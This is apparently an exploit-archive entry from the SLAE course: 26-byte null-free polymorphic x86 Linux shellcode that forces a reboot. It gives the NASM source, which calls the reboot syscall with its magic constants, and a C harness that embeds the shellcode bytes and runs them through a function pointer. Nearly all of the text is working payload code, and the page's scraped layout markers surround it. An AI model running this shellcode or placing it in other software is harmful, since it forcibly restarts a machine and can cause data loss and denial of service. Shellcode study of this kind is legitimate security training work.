55 lines
No EOL
1.5 KiB
Text
55 lines
No EOL
1.5 KiB
Text
# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
|
|
# Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
|
|
# Date: 2020-03-23
|
|
# Author: Upayan a.k.a. slaeryan
|
|
# Contact: upayansaha@icloud.com
|
|
# SLAE: 1525
|
|
# Vendor Homepage: None
|
|
# Software Link: None
|
|
# Tested on: Linux x86
|
|
# CVE: N/A
|
|
|
|
|
|
/*
|
|
; Filename: reboot_polymorphic.nasm
|
|
; Author: Upayan a.k.a. slaeryan
|
|
; SLAE: 1525
|
|
; Contact: upayansaha@icloud.com
|
|
; Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
|
|
; Testing: ./reboot_polymorphic
|
|
; Compile with: ./compile.sh reboot_polymorphic
|
|
; Size of shellcode: 26 bytes
|
|
|
|
global _start
|
|
|
|
section .text
|
|
_start:
|
|
xor eax, eax ; Clearing the EAX register
|
|
xor ebx, ebx ; Clearing the EBX register
|
|
xor ecx, ecx ; Clearing the ECX register
|
|
cdq ; Clearing the EDX register
|
|
mov al, 0x58 ; Loading syscall value = 0x58 for reboot in AL
|
|
mov ebx, 0xfee1dead ; Loading magic 1 in EBX
|
|
mov ecx, 672274793 ; Loading magic 2 in ECX
|
|
mov edx, 0x1234567 ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX
|
|
int 0x80 ; Executing the reboot syscall
|
|
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
unsigned char code[] = \
|
|
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
|
|
|
|
void main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
} |